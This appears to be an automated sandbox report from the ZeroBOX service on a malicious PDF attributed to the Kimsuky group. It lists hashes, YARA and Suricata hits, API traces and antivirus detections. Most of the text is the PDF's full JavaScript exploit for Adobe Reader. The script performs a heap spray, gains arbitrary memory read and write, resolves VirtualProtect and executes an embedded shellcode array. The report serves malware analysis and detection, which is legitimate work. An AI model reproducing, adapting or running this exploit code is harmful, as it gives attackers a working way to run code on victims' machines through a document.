Summary | ZeroBOX

2.pdf

Kimsuky Javascript ShellCode PDF
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 9, 2021, 9:59 p.m. Aug. 9, 2021, 10:01 p.m.
Size 685.9KB
Type PDF document, version 2.0
MD5 de2a8a728f81d44562bfd3e91c95f002
SHA256 7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e
CRC32 1BA377DA
ssdeep 12288:e9wwBpdbie7g84OTKuBqOX1BNVT5m+YH+JARGEwuxkIOcaj/5vDTWjaOyGj:Xkdz7y2DBJ1dYHoARzTkjcwvDTWOO
Yara
  • PDF_Javascript_ShellCode - PDF Javascript ShellCode
  • APT_Kimsuky_PDF_Shellcode_Aug_2021_1 - Detect Kimsuky shellcode used in fake PDF against South Korea
  • PDF_Format_Z - PDF Format

IP Address Status Action
164.124.101.2 Active Moloch
23.212.12.57 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 23.212.12.57:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
23.212.12.57:443
C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA C=US, ST=California, L=San Jose, O=Adobe Inc, CN=*.adobe.com 34:65:16:66:1c:13:4a:0f:09:e2:e7:a8:54:c8:fc:ad:48:e8:ce:89

Attached file aaaaa
Javascript code var mem_arr = new Array(0x3000); var mem_arr1 = new Array(0x1000); var fill_heap = new Array(0x5000); var buf_arr = new Array(0x300); var dvshellbuf; var fake_arr; var base_mem = 0; var base_addr = 0; var viewer = 0; var AcroForm_Base = 0; var myfieldaddress; var dllName = new Uint8Array([0x6B, 0x65, 0x72, 0x6E, 0x65, 0x6C, 0x33, 0x32, 0x2E, 0x64, 0x6C, 0x6C, 0]); var funcName = new Uint8Array([0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x50, 0x72, 0x6F, 0x74, 0x65, 0x63, 0x74, 0]); var beforevftable; var addr, xaddr; var read_array; var fakeIdx = 1; var field_arr = new Array(0x100); function kk(addr) { var arbAddr = viewer[2] - base_addr; var memView = new DataView(base_mem); var old = memView.getUint8(arbAddr + 0x50); old = (old << 8) + memView.getUint8(arbAddr + 0x51); old = (old << 8) + memView.getUint8(arbAddr + 0x52); old = (old << 8) + memView.getUint8(arbAddr + 0x53); memView.setUint32(arbAddr + 0x50, addr, true); var ret = read_array[0]; memView.setUint32(arbAddr + 0x50, old, true); return ret; } function jj() { for (var i = 0; i < 0x3000; i++) { if (mem_arr[i].byteLength < 0) { fakeIdx = i; break; } } base_mem = mem_arr[fakeIdx]; viewer = new Uint32Array(mem_arr[fakeIdx - 1], 0x37D8, 0x20); var arb_Addr = viewer[2]; var field_Addr = viewer[0]; } function ii() { addr = kk(base_addr + 0x8); addr = kk(addr + 0x10); addr = kk(addr + 0x10); addr = kk(addr + 0x0C); beforevftable = kk(addr + 4); addr = kk(beforevftable); AcroForm_Base = (addr - 0x60000) & 0xFFFFF000; while (kk(AcroForm_Base) != 0x905A4D) { AcroForm_Base -= 0x1000; } } function hh() { var addesobject = kk(base_addr + 0x10); var dv = new DataView(mem_arr[fakeIdx - 1]); for (i = 0; i < 8; i++) { dv.setUint32(4 * i, kk(addesobject + i * 4), true); } } function gg() { var e_lfanew = kk(AcroForm_Base + 0x3C); var imgNtHdr = AcroForm_Base + e_lfanew; if (kk(imgNtHdr) != 0x4550) { return 0; } var sizeofOptionalHdr = kk(imgNtHdr + 0x14) & 0xFFFF; var sectionHdr = imgNtHdr + sizeofOptionalHdr + 0x18; while (kk(sectionHdr) != 0x7865742E) { sectionHdr += 0x28; if (kk(sectionHdr + 0xC) == 0) { return 0; } } var retArray = new Array(4); retArray[0] = AcroForm_Base + kk(sectionHdr + 0x0C); retArray[1] = kk(sectionHdr + 0x10); var dataDir = imgNtHdr + 0x18 + 0x60; retArray[2] = AcroForm_Base + kk(dataDir + 8); retArray[3] = kk(dataDir + 0x0C); return retArray; } function ff(addr, size, target) { var viewText = new Uint8Array(base_mem, addr - base_addr, size); var alertnum = 0; for (var i = 0; i < size - target.length; i++) { var breaked = false; for (var j = 0; j < target.length; j++) { var v = viewText[i + j]; if (alertnum < 3) { alertnum++; } if (v != target[j]) { breaked = true; break; } } if (!breaked) { return i + addr; } } return 0; } function ee(iatAddr, iatSize, dllName, funcName) { var dirAddr = iatAddr; var bFind = false; while (kk(dirAddr + 0x10) != 0) { var dllNameAddr = kk(dirAddr + 0x0C) + AcroForm_Base; var idx = 0; var breaked = false; var a = kk(dllNameAddr) & 0xFF; while (a != 0) { if (a != dllName[idx] && a + 0x20 != dllName[idx]) { breaked = true; break; } idx++; dllNameAddr++; if (idx > dllName.length) { breaked = true; break; } a = kk(dllNameAddr) & 0xFF; } if (!breaked) { bFind = true; break; } dirAddr += 0x14; } if (!bFind) { return 0; } var iatNames = kk(dirAddr) + AcroForm_Base; var iatAddrs = kk(dirAddr + 0x10) + AcroForm_Base; var funcNameAddr = kk(iatNames) + AcroForm_Base; while (funcNameAddr != 0) { funcNameAddr += 2; var a = kk(funcNameAddr) & 0xFF; var idx = 0; var breaked = false; while (a != 0) { if (a != funcName[idx]) { breaked = true; break; } idx++; if (idx > funcName.length) { breaked = true; break; } funcNameAddr++; a = kk(funcNameAddr) & 0xFF; } if (!breaked) { return kk(iatAddrs); } iatNames += 4; iatAddrs += 4; funcNameAddr = kk(iatNames) + AcroForm_Base; } return 0; } function dd() { var arbAddr = viewer[2] - base_addr; var memView = new DataView(base_mem); var old = memView.getUint8(arbAddr + 0x50); old = (old << 8) + memView.getUint8(arbAddr + 0x51); old = (old << 8) + memView.getUint8(arbAddr + 0x52); old = (old << 8) + memView.getUint8(arbAddr + 0x53); memView.setUint32(arbAddr + 0x50, xaddr, true); read_array[0] = base_addr + 0x8000; memView.setUint32(arbAddr + 0x50, old, true); } var xfuncaddr; function c() { xaddr = kk(base_addr + 0x20); xaddr = kk(xaddr + 0x10); xaddr = kk(xaddr + 0x10); xaddr = kk(xaddr + 0x4); xaddr = kk(xaddr + 0x4); if (kk(xaddr + 0x34) == 0) { xfuncaddr = kk(xaddr); } else { xaddr = kk(xaddr + 0x34); xfuncaddr = kk(xaddr); } } function b() { for (var i = 0; i < 0x5000; i++) { fill_heap[i] = unescape("%u5050%u2020%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030%u3030"); } var cXMLDoc = "<family name = 'Robat'>\ <mom id = 'm3' name = 'Mary' gender='F'>\ <spouse> m2 </spouse>\ <personal>\ <income>25000</income>\ </personal>\ </mom>\ </family>"; var myXML = XMLData.parse(cXMLDoc, false); var a = XMLData.applyXPath(myXML, "//family/mom"); fake_arr = this.dataObjects[0]; this.createDataObject("abname", "qwer"); var bChged = false; for (var i = 1; i < 0x10000; i++) { if (fake_arr[i] == 0x41424241) { fake_arr[i - 2] = 0; myfieldaddress = this.addField("FieldField", "text", 0, [0, 0, 10, 10]); fake_arr[i + 1] = myfieldaddress; fake_arr[i + 2] = this.getDataObject("abname"); fake_arr[i + 3] = shellbuf; fake_arr[i + 4] = a; base_addr = 0x30303830 + i * 8; bChged = true; var temp = new Array(0x1000); for (var j = 0x1000; j >= 0; j--) { temp[j] = new Array(0x100); } for (var j = i - 0x10; j >= 2; j--) { fake_arr[j] = new ArrayBuffer(0x1000); } read_array = new Uint32Array(0x100); fake_arr[1] = read_array; break; } } if (bChged) { jj(); ii(); hh(); c(); var textRVA = gg(); var opCodes = new Uint8Array([0x94, 0xC3]); var opCodeAddr = ff(textRVA[0], textRVA[1], opCodes); var funcAddr = ee(textRVA[2], textRVA[3], dllName, funcName); var frontvftable = kk(addr - 4); var shellcdeaddr = kk(base_addr + 0x18); shellcdeaddr = kk(shellcdeaddr + 0xc); var expArrbuf = new DataView(base_mem, 0x8000, 0x1100); for (i = 0; i < 0x300; i++) { expArrbuf.setUint32(i * 4, kk(xfuncaddr + i * 4), true); } expArrbuf.setUint32(9 * 4, opCodeAddr, true); expArrbuf.setUint32(0, funcAddr, true); expArrbuf.setUint32(4, shellcdeaddr, true); expArrbuf.setUint32(0x8, shellcdeaddr, true); expArrbuf.setUint32(0xC, 0x1000, true); expArrbuf.setUint32(0x10, 0x40, true); expArrbuf.setUint32(0x14, 0x30303020, true); expArrbuf.setUint32(0x1000, xaddr, true); expArrbuf.setUint32(0x1004, xfuncaddr, true); dd(); a.saveXML('pretty'); } var dv2 = new DataView(mem_arr[fakeIdx - 1]); for (k = 0; k < 8; k++) { var old = dv2.getUint8(k * 4 + 3); old = (old << 8) + dv2.getUint8(k * 4 + 2); old = (old << 8) + dv2.getUint8(k * 4 + 1); old = (old << 8) + dv2.getUint8(k * 4); dv2.setUint32((3062 + k) * 4, old, true); } } function a() { for (var i = 0; i < 0x80; i++) { field_arr[i] = this.addField("Field_" + i, "text", 0, [0, 800, 55, 850]); } for (var i = 0; i < 0x80; i++) { this.removeField("Field_" + i); } for (var i = 0; i < 0x300; i++) { buf_arr[i] = unescape("%u9584%u9584%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9640%u9648%u9648%u9648%u9648"); if (i == 0x250) this.dataObjects[0].toString(); } for (var i = 0; i < 0x300; i++) { delete buf_arr[i]; buf_arr[i] = null; } this.dataObjects[0] = null; g_timeout = app.setTimeOut("b();", 10000); } for (var i = 0; i < 0x1000; i++) { mem_arr1[i] = new ArrayBuffer(0x100); var dv1 = new DataView(mem_arr1[i]); dv1.setUint32(0, 0x41424241, true); dv1.setUint32(4, 0xffffff81, true); } for (var i = 0; i < 0x3000; i++) { mem_arr[i] = new ArrayBuffer(0xffe8); var dv = new DataView(mem_arr[i]); dv.setUint32(0, 0x41424241, true); dv.setUint32(4, 0xffffff81, true); dv.setUint32(0x2FD8, 0x30303060, true); dv.setUint32(0x2FD8 + 4, 0x30303100, true); dv.setUint32(0x2FD8 + 0xC, 0x30303830, true); dv.setUint32(0x2FD8 + 0x24, 0x10000, true); dv.setUint32(0x2FD8 + 0x30, 0x30303090, true); dv.setUint32(0x2FD8 + 0x60, 0x303030C0, true); dv.setUint32(0x2FD8 + 0x6C, 0x30303200, true); dv.setUint32(0x2FD8 + 0x70, 0x1000, true); dv.setUint32(0x2FD8 + 0x1E9, 1, true); dv.setUint32(0x2FD8 + 0xD0, 0x30303130, true); dv.setUint32(0x2FD8 + 0x800 - 0xC, 0x10000, true); dv.setUint32(0x2FD8 + 0x800 - 0x8, 8, true); dv.setUint32(0x2FD8 + 0x800 - 0x4, 0x10000, true); } var shellbuf = new ArrayBuffer(0x25000); var dvshell = new DataView(shellbuf); var dvshellbuf = new Uint32Array([0xEC8B5560, 0x000017E8, 0x8B615D00, 0x0CE883C5, 0x9058B894, 0x088B3031, 0x8904408B, 0x2460FF01, 0x83EC8B55, 0x565310EC, 0xEB5DEB57, 0x6C61635B, 0x78652E63, 0x55600065, 0x2C246C8B, 0x8B3C458B, 0x03780554, 0x184A8BD5, 0x03205A8B, 0x348B49DD, 0x33F5038B, 0xFCC033FF, 0x74C084AC, 0x0DCFC107, 0xF4EBF803, 0x28247C3B, 0x5A8BE375, 0x66DD0324, 0x8B4B0C8B, 0xDD031C5A, 0x038B048B, 0x45895DC5, 0x458B61F4, 0x0008C2F4, 0x81EC8B55, 0x001000EC, 0x0000E800, 0x835F0000, 0x06EB38C7, 0x05EA835A, 0xF5E805EB, 0x8DFFFFFF, 0xAB10F905, 0x89D02B00, 0x058DF855, 0x00AB108D, 0x89F84503, 0xC933F045, 0xA164C033, 0x00000030, 0x8B0C408B, 0x368B1C70, 0x8B08568B, 0x3966207E, 0xF275184F, 0x746B3F80, 0x4B3F8007, 0xE6EB0274, 0x330C7F80, 0x5589E075, 0xFC5D8BFC, 0x53FC5D8B, 0x8AFE9868, 0xF055FF0E, 0x1084058D, 0x450300AB, 0x50006AF8, 0x81F455FF, 0x001000C4, 0x5E5F5D00, 0x5DE58B5B, 0x909090C3]); for (var i = 0; i < dvshellbuf.length; i++) { dvshell.setUint32(i * 4, dvshellbuf[i], true); } g_timeout = app.setTimeOut("a();", 3500);
request HEAD https://armmf.adobe.com/arm-manifests/win/ReaderDCManifest3.msi
request GET https://armmf.adobe.com/arm-manifests/win/ReaderDCManifest3.msi
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f343000
process_handle: 0xffffffff
1 0 0
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
parent_process acrord32.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
Lionic Trojan.PDF.Agent.b!c
ALYac Trojan.PDF.208091A
Arcabit Trojan.Generic.D2C923C7
Cyren PDF/Trojan.AFWQ-0
ESET-NOD32 PDF/Exploit.Pidief.AAZ
TrendMicro-HouseCall TROJ_FRS.0NA104H621
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan-Dropper.PDF.Agent.gen
BitDefender Trojan.GenericKD.46736327
ViRobot Trojan.Win32.S.FakePDF.702372
MicroWorld-eScan Trojan.GenericKD.46736327
Ad-Aware Trojan.GenericKD.46736327
Comodo Malware@#1nnwapqfqw1d0
TrendMicro TROJ_FRS.0NA104H621
McAfee-GW-Edition Artemis!Trojan
FireEye Trojan.GenericKD.46736327
Emsisoft Trojan.GenericKD.46736327 (B)
Ikarus Exploit.Pidief
ZoneAlarm HEUR:Trojan-Dropper.PDF.Agent.gen
GData Trojan.GenericKD.46736327
AhnLab-V3 Exploit/PDF.FakeDocu
McAfee Artemis!DE2A8A728F81
Fortinet JS/Agent.5F4E!tr
AVG Other:Malware-gen [Trj]
Qihoo-360 susp.pdf.jsexp.gen
count 12275 name heapspray process AcroRd32.exe total_mb 767 length 65536 protection PAGE_READWRITE